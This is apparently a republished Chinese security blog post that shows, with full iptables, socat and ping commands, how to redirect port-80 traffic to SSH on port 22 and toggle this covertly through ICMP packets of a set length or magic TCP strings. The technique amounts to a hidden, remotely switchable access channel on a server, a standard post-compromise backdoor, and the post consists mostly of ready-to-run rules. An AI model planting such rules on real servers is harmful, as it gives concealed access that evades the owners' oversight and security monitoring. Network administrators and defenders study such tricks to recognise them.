前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >远程遥控IPTables进行端口复用

远程遥控IPTables进行端口复用

作者头像
FB客服
发布2018-02-28 15:36:00
1.6K0
发布2018-02-28 15:36:00
举报
文章被收录于专栏:FreeBufFreeBuf

有一天坐地铁的时候突然想到利用 iptables nat 表的 PREROUTING 链配合 REDIRECT 应该是可以达到端口复用的效果的。比如在服务器的 PREROUTING 链里面加一条规则,将到本机 80 端口的流量 REDIRECT 到 22 端口,就算 80 端口正在被 Apache 监听,此流量也能成功到达 22 端口,因为 nat 表的 PREROUTING 链会在路由决策之前被处理。

远程遥控 IPTables 进行端口复用

现在的问题只有一个,如何区分到 80 端口的正常流量和“复用流量”? 正常的的 HTTP 流量应该让它正常地发往 Apache,而“复用流量”应该前往 22 端口。答案也很简单,只要“复用流量”有特征就可以了。

当天晚上我简单写了一个 PoC 来验证我的想法,如下:192.168.33.78 为虚拟机的 IP,虚拟机上用 python 在 80 端口启动了一个 http 服务虚拟机上执行:

将发送本机 80 端口,源端口为 8989 的流量重定向至本机 22 端口/sbin/iptables -t nat -A PREROUTING -p tcp —sport 8989 —dport 80 -j REDIRECT —to-port 22

本地执行:

socat 监听本地 2326 端口,接收到链接后,利用本地的 8989 端口将流量转至虚拟机的 80 端口socat tcp-listen:2326,fork,reuseaddr tcp:192.168.33.78:80,sourceport=8989,reuseaddr &# SSH 连接本地 2326 端口,成功连接上了虚拟机的 SSH,同时本地正常用 curl 是能够访问到虚拟机的 80 端口的 HTTP 服务的ssh vagrant@127.0.0.1 -p 2326

效果图:

以上是最初的 PoC。它有一个很明显的问题是不支持多链接。 如果想创建两个 SSH 链接就会出错,因为本地的 8989 端口已经被第一个 SSH 连接占用了。

今天我对这个方法进行了改进,不再用 source port 做为 “复用流量” 的标识,所以也就不再用 socat 来进行一次本地的转发了。同时,加入了远程遥控端口复用开关的功能。我这里直接放出脚本代码:

第一种方式:利用 icmp 做遥控开关。缺点在于如果目标在内网,你是无法直接 ping 到它的。

创建端口复用链iptables -t nat -N LETMEIN# 创建端口复用规则,将流量转发至 22 端口iptables -t nat -A LETMEIN -p tcp -j REDIRECT —to-port 22# 开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为 letmein 的列表中iptables -t nat -A PREROUTING -p icmp —icmp-type 8 -m length —length 1139 -m recent —set —name letmein —rsource -j ACCEPT# 关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉iptables -t nat -A PREROUTING -p icmp —icmp-type 8 -m length —length 1140 -m recent —name letmein —remove -j ACCEPT# let’s do it,如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒iptables -t nat -A PREROUTING -p tcp —dport 80 —syn -m recent —rcheck —seconds 3600 —name letmein —rsource -j LETMEIN

开启复用前,WEB 是可以访问的:

开启复用ping -c 1 -s 1111 192.168.33.78向目标发送一个长度为 1111 的 ICMP 数据包(加上包头28,总长度实际为1139)

关闭复用ping -c 1 -s 1112 192.168.33.78向目标发送一个长度为 1112 的 ICMP 数据包(加上包头 28,总长度实际为 1140)

效果图:

第二种方式:利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网。

端口复用链iptables -t nat -N LETMEIN# 端口复用规则iptables -t nat -A LETMEIN -p tcp -j REDIRECT —to-port 22# 开启开关iptables -A INPUT -p tcp -m string —string ‘threathuntercoming’ —algo bm -m recent —set —name letmein —rsource -j ACCEPT# 关闭开关iptables -A INPUT -p tcp -m string —string ‘threathunterleaving’ —algo bm -m recent —name letmein —remove -j ACCEPT# let’s do itiptables -t nat -A PREROUTING -p tcp —dport 80 —syn -m recent —rcheck —seconds 3600 —name letmein —rsource -j LETMEI 开启复用,开启后本机到目标 80 端口的流量将转发至目标的 SSH,80 将无法再被本机访问:echo threathuntercoming | socat - tcp:192.168.33.78:80 关闭复用,关闭后,80 恢复正常:echo threathunterleaving | socat - tcp:192.168.33.78:80

效果图:

只要有特征,就可以做为远程遥控的标志。我这里只是想验证一下自己的想法,所以用了我认为最简单的两种方法。其它方法希望大家自己挖掘,分享。

最后留一个小问题,如果在开启 tcpdump 进行抓包的同时,利用 iptables 对数据包进行了更改,那 tcpdump 抓到的是更改之前的包还是更改之后的包呢? :)

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-06-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 远程遥控 IPTables 进行端口复用
    • 第一种方式:利用 icmp 做遥控开关。缺点在于如果目标在内网,你是无法直接 ping 到它的。
      • 开启复用前,WEB 是可以访问的:
        • 第二种方式:利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档